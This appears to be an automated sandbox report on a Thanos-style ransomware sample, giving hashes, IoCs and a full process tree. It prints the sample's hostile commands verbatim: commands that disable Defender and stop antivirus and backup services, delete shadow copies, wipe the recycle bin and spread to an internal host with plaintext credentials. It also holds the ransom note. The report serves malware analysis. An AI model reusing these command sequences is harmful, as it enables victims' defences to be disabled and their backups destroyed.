Analysis
-
max time kernel
197s -
max time network
140s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
04-11-2021 14:41
Static task
static1
Behavioral task
behavioral1
Sample
thanos-cleaned.exe
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
thanos-cleaned.exe
Resource
win10-en-20210920
General
-
Target
thanos-cleaned.exe
-
Size
92KB
-
MD5
fe7dcc0f74e152a78963d560b2e3d148
-
SHA1
f9cf1dd1a7e8b2dffc9e0195685cef5a625832ea
-
SHA256
6a5090762c6058bc223e37e89f53832faad80995e3c5ed7e59ed9f5a5e604e47
-
SHA512
a1d2de8abf7e56a2c29bfa38d0ae23584db2174ec8b14c6da3220e1c52ad52861714f8c363be843d16cdf13a22e0b74c16a1cb684ba102f132b09133338a169a
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Blocklisted process makes network request 2 IoCs
flow pid Process 31 6140 mshta.exe 33 6140 mshta.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 4748 5ivji2sf.exe -
Modifies extensions of user files 4 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File created C:\Users\Admin\Pictures\DisableResolve.tiff.crypted thanos-cleaned.exe File opened for modification C:\Users\Admin\Pictures\DisableResolve.tiff thanos-cleaned.exe File created C:\Users\Admin\Pictures\ResetUnregister.raw.crypted thanos-cleaned.exe File created C:\Users\Admin\Pictures\UnblockFormat.raw.crypted thanos-cleaned.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk thanos-cleaned.exe -
Enumerates connected drives 3 TTPs 18 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe -
Modifies WinLogon 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..." thanos-cleaned.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n" thanos-cleaned.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 14 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3704 vssadmin.exe 4832 vssadmin.exe 3664 vssadmin.exe 4484 vssadmin.exe 2164 vssadmin.exe 4236 vssadmin.exe 5680 vssadmin.exe 648 vssadmin.exe 5628 vssadmin.exe 1824 vssadmin.exe 4492 vssadmin.exe 4372 vssadmin.exe 348 vssadmin.exe 376 vssadmin.exe -
Kills process with taskkill 3 IoCs
pid Process 4744 taskkill.exe 1084 taskkill.exe 4112 taskkill.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4056 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 4024 powershell.exe 4024 powershell.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 4024 powershell.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2856 thanos-cleaned.exe Token: SeDebugPrivilege 4024 powershell.exe Token: SeIncreaseQuotaPrivilege 4024 powershell.exe Token: SeSecurityPrivilege 4024 powershell.exe Token: SeTakeOwnershipPrivilege 4024 powershell.exe Token: SeLoadDriverPrivilege 4024 powershell.exe Token: SeSystemProfilePrivilege 4024 powershell.exe Token: SeSystemtimePrivilege 4024 powershell.exe Token: SeProfSingleProcessPrivilege 4024 powershell.exe Token: SeIncBasePriorityPrivilege 4024 powershell.exe Token: SeCreatePagefilePrivilege 4024 powershell.exe Token: SeBackupPrivilege 4024 powershell.exe Token: SeRestorePrivilege 4024 powershell.exe Token: SeShutdownPrivilege 4024 powershell.exe Token: SeDebugPrivilege 4024 powershell.exe Token: SeSystemEnvironmentPrivilege 4024 powershell.exe Token: SeRemoteShutdownPrivilege 4024 powershell.exe Token: SeUndockPrivilege 4024 powershell.exe Token: SeManageVolumePrivilege 4024 powershell.exe Token: 33 4024 powershell.exe Token: 34 4024 powershell.exe Token: 35 4024 powershell.exe Token: 36 4024 powershell.exe Token: SeDebugPrivilege 1736 powershell.exe Token: SeDebugPrivilege 2896 powershell.exe Token: SeDebugPrivilege 360 powershell.exe Token: SeDebugPrivilege 2528 powershell.exe Token: SeDebugPrivilege 948 powershell.exe Token: SeDebugPrivilege 1444 powershell.exe Token: SeDebugPrivilege 2136 powershell.exe Token: SeDebugPrivilege 3680 powershell.exe Token: SeDebugPrivilege 2156 powershell.exe Token: SeDebugPrivilege 3760 powershell.exe Token: SeDebugPrivilege 3284 powershell.exe Token: SeDebugPrivilege 64 powershell.exe Token: SeIncreaseQuotaPrivilege 1736 powershell.exe Token: SeSecurityPrivilege 1736 powershell.exe Token: SeTakeOwnershipPrivilege 1736 powershell.exe Token: SeLoadDriverPrivilege 1736 powershell.exe Token: SeSystemProfilePrivilege 1736 powershell.exe Token: SeSystemtimePrivilege 1736 powershell.exe Token: SeProfSingleProcessPrivilege 1736 powershell.exe Token: SeIncBasePriorityPrivilege 1736 powershell.exe Token: SeCreatePagefilePrivilege 1736 powershell.exe Token: SeBackupPrivilege 1736 powershell.exe Token: SeRestorePrivilege 1736 powershell.exe Token: SeShutdownPrivilege 1736 powershell.exe Token: SeDebugPrivilege 1736 powershell.exe Token: SeSystemEnvironmentPrivilege 1736 powershell.exe Token: SeRemoteShutdownPrivilege 1736 powershell.exe Token: SeUndockPrivilege 1736 powershell.exe Token: SeManageVolumePrivilege 1736 powershell.exe Token: 33 1736 powershell.exe Token: 34 1736 powershell.exe Token: 35 1736 powershell.exe Token: 36 1736 powershell.exe Token: SeIncreaseQuotaPrivilege 948 powershell.exe Token: SeSecurityPrivilege 948 powershell.exe Token: SeTakeOwnershipPrivilege 948 powershell.exe Token: SeLoadDriverPrivilege 948 powershell.exe Token: SeSystemProfilePrivilege 948 powershell.exe Token: SeSystemtimePrivilege 948 powershell.exe Token: SeProfSingleProcessPrivilege 948 powershell.exe Token: SeIncBasePriorityPrivilege 948 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe 2856 thanos-cleaned.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 6140 mshta.exe 6140 mshta.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2856 wrote to memory of 4024 2856 thanos-cleaned.exe 69 PID 2856 wrote to memory of 4024 2856 thanos-cleaned.exe 69 PID 2856 wrote to memory of 2896 2856 thanos-cleaned.exe 72 PID 2856 wrote to memory of 2896 2856 thanos-cleaned.exe 72 PID 2856 wrote to memory of 1736 2856 thanos-cleaned.exe 74 PID 2856 wrote to memory of 1736 2856 thanos-cleaned.exe 74 PID 2856 wrote to memory of 360 2856 thanos-cleaned.exe 76 PID 2856 wrote to memory of 360 2856 thanos-cleaned.exe 76 PID 2856 wrote to memory of 2528 2856 thanos-cleaned.exe 78 PID 2856 wrote to memory of 2528 2856 thanos-cleaned.exe 78 PID 2856 wrote to memory of 948 2856 thanos-cleaned.exe 80 PID 2856 wrote to memory of 948 2856 thanos-cleaned.exe 80 PID 2856 wrote to memory of 1444 2856 thanos-cleaned.exe 82 PID 2856 wrote to memory of 1444 2856 thanos-cleaned.exe 82 PID 2856 wrote to memory of 2136 2856 thanos-cleaned.exe 83 PID 2856 wrote to memory of 2136 2856 thanos-cleaned.exe 83 PID 2856 wrote to memory of 3680 2856 thanos-cleaned.exe 87 PID 2856 wrote to memory of 3680 2856 thanos-cleaned.exe 87 PID 2856 wrote to memory of 2156 2856 thanos-cleaned.exe 114 PID 2856 wrote to memory of 2156 2856 thanos-cleaned.exe 114 PID 2856 wrote to memory of 3760 2856 thanos-cleaned.exe 89 PID 2856 wrote to memory of 3760 2856 thanos-cleaned.exe 89 PID 2856 wrote to memory of 3284 2856 thanos-cleaned.exe 91 PID 2856 wrote to memory of 3284 2856 thanos-cleaned.exe 91 PID 2856 wrote to memory of 64 2856 thanos-cleaned.exe 93 PID 2856 wrote to memory of 64 2856 thanos-cleaned.exe 93 PID 2856 wrote to memory of 2212 2856 thanos-cleaned.exe 94 PID 2856 wrote to memory of 2212 2856 thanos-cleaned.exe 94 PID 2856 wrote to memory of 2640 2856 thanos-cleaned.exe 95 PID 2856 wrote to memory of 2640 2856 thanos-cleaned.exe 95 PID 2856 wrote to memory of 1556 2856 thanos-cleaned.exe 112 PID 2856 wrote to memory of 1556 2856 thanos-cleaned.exe 112 PID 2856 wrote to memory of 2320 2856 thanos-cleaned.exe 110 PID 2856 wrote to memory of 2320 2856 thanos-cleaned.exe 110 PID 2856 wrote to memory of 2412 2856 thanos-cleaned.exe 97 PID 2856 wrote to memory of 2412 2856 thanos-cleaned.exe 97 PID 2856 wrote to memory of 1684 2856 thanos-cleaned.exe 98 PID 2856 wrote to memory of 1684 2856 thanos-cleaned.exe 98 PID 2856 wrote to memory of 1200 2856 thanos-cleaned.exe 99 PID 2856 wrote to memory of 1200 2856 thanos-cleaned.exe 99 PID 2856 wrote to memory of 424 2856 thanos-cleaned.exe 106 PID 2856 wrote to memory of 424 2856 thanos-cleaned.exe 106 PID 2856 wrote to memory of 3112 2856 thanos-cleaned.exe 101 PID 2856 wrote to memory of 3112 2856 thanos-cleaned.exe 101 PID 2856 wrote to memory of 4128 2856 thanos-cleaned.exe 103 PID 2856 wrote to memory of 4128 2856 thanos-cleaned.exe 103 PID 2856 wrote to memory of 4184 2856 thanos-cleaned.exe 115 PID 2856 wrote to memory of 4184 2856 thanos-cleaned.exe 115 PID 2212 wrote to memory of 4216 2212 net.exe 251 PID 2212 wrote to memory of 4216 2212 net.exe 251 PID 2856 wrote to memory of 4272 2856 thanos-cleaned.exe 116 PID 2856 wrote to memory of 4272 2856 thanos-cleaned.exe 116 PID 2640 wrote to memory of 4288 2640 net.exe 249 PID 2640 wrote to memory of 4288 2640 net.exe 249 PID 1556 wrote to memory of 4360 1556 net.exe 117 PID 1556 wrote to memory of 4360 1556 net.exe 117 PID 2856 wrote to memory of 4376 2856 thanos-cleaned.exe 247 PID 2856 wrote to memory of 4376 2856 thanos-cleaned.exe 247 PID 2320 wrote to memory of 4412 2320 net.exe 246 PID 2320 wrote to memory of 4412 2320 net.exe 246 PID 2856 wrote to memory of 4432 2856 thanos-cleaned.exe 118 PID 2856 wrote to memory of 4432 2856 thanos-cleaned.exe 118 PID 2412 wrote to memory of 4500 2412 net.exe 243 PID 2412 wrote to memory of 4500 2412 net.exe 243
Processes
-
C:\Users\Admin\AppData\Local\Temp\thanos-cleaned.exe"C:\Users\Admin\AppData\Local\Temp\thanos-cleaned.exe"1⤵
- Modifies extensions of user files
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2856 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4024
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2896
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1736
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:360
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:948
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1444
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 62⤵
- Suspicious use of AdjustPrivilegeToken
PID:2136
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:3680
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 62⤵
- Suspicious use of AdjustPrivilegeToken
PID:3760
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3284
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 22⤵
- Suspicious use of AdjustPrivilegeToken
PID:64
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop avpsus /y2⤵
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵PID:4216
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵PID:4288
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵
- Suspicious use of WriteProcessMemory
PID:2412 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵PID:4500
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop DefWatch /y2⤵PID:1684
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵PID:4588
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccEvtMgr /y2⤵PID:1200
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵PID:4744
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SavRoam /y2⤵PID:3112
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵PID:4832
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop RTVscan /y2⤵PID:4128
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵PID:4960
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccSetMgr /y2⤵PID:424
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵PID:4668
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BMR Boot Service /y2⤵
- Suspicious use of WriteProcessMemory
PID:2320 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵PID:4412
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfewc /y2⤵
- Suspicious use of WriteProcessMemory
PID:1556 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵PID:4360
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 62⤵
- Suspicious use of AdjustPrivilegeToken
PID:2156
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBFCService /y2⤵PID:4184
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵PID:5096
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBIDPService /y2⤵PID:4272
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵PID:380
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBCFMonitorService /y2⤵PID:4432
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵PID:4596
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooBackup /y2⤵PID:4532
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵PID:4608
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop zhudongfangyu /y2⤵PID:4648
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵PID:5092
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooIT /y2⤵PID:4600
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵PID:4896
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:5128
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵PID:5632
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵PID:2300
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y3⤵PID:5980
-
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵PID:4672
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin2⤵PID:4576
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:5680
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3704
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:648
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4492
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4372
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:348
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4832
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3664
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2164
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4484
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:376
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:5628
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:1824
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:4236
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
PID:1084
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
PID:4112
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
PID:4744
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵PID:5584
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵PID:1384
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵PID:2972
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sophos /y2⤵PID:5560
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵PID:5604
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcronisAgent /y2⤵PID:4592
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:2128
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:4616
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:4660
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵PID:520
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:4468
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:4584
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:4336
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop PDVFSService /y2⤵PID:4156
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop veeam /y2⤵PID:5084
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:5012
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:4940
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:4876
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VSNAPVSS /y2⤵PID:4804
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop stc_raw_agent /y2⤵PID:4724
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵PID:4376
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.127.1.46 /USER:SHJPOLICE\amer !Omar20122⤵PID:4336
-
-
C:\Users\Admin\AppData\Local\Temp\5ivji2sf.exe"C:\Users\Admin\AppData\Local\Temp\5ivji2sf.exe" \10.127.1.46 -u SHJPOLICE\amer -p !Omar2012 -d -f -h -s -n 2 -c C:\Users\Admin\AppData\Local\Temp\thanos-cleaned.exe2⤵
- Executes dropped EXE
PID:4748
-
-
C:\Windows\SYSTEM32\arp.exe"arp" -a2⤵PID:4700
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta2⤵
- Blocklisted process makes network request
- Suspicious use of SetWindowsHookEx
PID:6140
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵PID:5204
-
C:\Windows\system32\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
PID:4056
-
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵PID:2220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\thanos-cleaned.exe2⤵PID:1368
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:5848
-
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y1⤵PID:5204
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y1⤵PID:5336
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y1⤵PID:5388
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop veeam /y1⤵PID:5424
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y1⤵PID:5472
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y1⤵PID:5520
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y1⤵PID:5496
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y1⤵PID:5596
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y1⤵PID:5640
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y1⤵PID:5440
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophos /y1⤵PID:4344
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y1⤵PID:6012
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y1⤵PID:5964
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y1⤵PID:800
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:4168
-
